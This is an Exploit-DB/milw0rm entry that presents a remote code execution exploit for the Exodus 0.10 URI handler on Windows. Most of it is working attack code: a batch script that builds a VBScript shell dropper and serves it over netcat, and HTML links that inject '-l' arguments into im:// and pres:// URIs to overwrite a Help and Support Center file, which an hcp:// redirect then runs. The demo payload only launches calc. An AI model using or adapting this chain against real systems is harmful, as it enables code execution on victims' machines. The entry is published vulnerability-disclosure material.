Exodus 0.10 uri handler Arbitrary Parameter Injection Exploit

ID EDB-ID:7167
Type exploitdb
Reporter Nine:Situations:Group
Modified 2008-11-20T00:00:00


Exodus 0.10 (uri handler) Arbitrary Parameter Injection Exploit. CVE-2008-6935,CVE-2008-6936,CVE-2008-6937. Remote exploit for windows platform

Exodus v0.10 remote code execution exploit
by Nine:Situations:Group::strawdog

This uses the "-l" argument to overwrite a file
inside Microsoft Help and Support Center folders (oh rgod...)

Firstly run netcat in listen mode to drop the vbscript shell
run this script:

@echo off
rem dropsh.cmd
echo ^<SCRIPT LANGUAGE="VBScript"^> > testfile
echo Dim wshShell >> testfile
echo Set wshShell = CreateObject("WScript.Shell") >> testfile
echo wshShell.Run("cmd /c start calc") >> testfile
echo ^</SCRIPT^> >> testfile
nc -L -s -p 5222 -vv < testfile

<script type="text/javascript">
function doRedirect() {
location.href = "hcp://system/sysinfo/msinfo.htm";
function runcalc() {
window.setTimeout("doRedirect()", 10000);
<a href="im:///'%20-l%20C:\WINDOWS\PCHEALTH\HELPCTR\System\sysinfo\msinfo.htm%20-j%20strawdog@" onClick="runcalc()">click me</a><br>
<a href="pres:///'%20-l%20C:\WINDOWS\PCHEALTH\HELPCTR\System\sysinfo\msinfo.htm%20-j%20strawdog@" onClick="runcalc()">click me</a>

# milw0rm.com [2008-11-20]